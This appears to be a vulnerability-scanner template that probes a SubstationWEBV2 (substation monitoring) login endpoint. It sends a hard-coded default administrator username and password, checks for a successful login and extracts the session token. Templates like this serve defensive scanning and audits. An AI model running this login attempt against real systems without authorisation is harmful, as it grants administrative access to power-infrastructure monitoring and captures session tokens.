id: ECEMS-login-password

info:
  name: SubstationWEBV2 Login Endpoint
  author: ProjectDiscoveryAI
  severity: high
  description: |
    This template checks for successful login attempts on SubstationWEBV2 user login endpoint and extracts tokens from the response.

http:
  - raw:
      - |
        POST /SubstationWEBV2/user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 68
        Response-Msg: chinese
        Access-Control-Allow-Origin: *
        projectType: 4
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
        Accept: application/json, text/plain, */*
        Api-Version: 2.0.0
        Content-Type: application/x-www-form-urlencoded;charset=UTF-8
        Origin: {{BaseURL}}
        Accept-Encoding: gzip, deflate, br
        Accept-Language: zh-CN,zh;q=0.9
        Connection: keep-alive

        fLoginname=admin&fPassword=Acrel001&loginType=password&projectType=4

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "Login success"
          - "token"

    extractors:
      - type: json
        name: token
        json:
          - ".token"
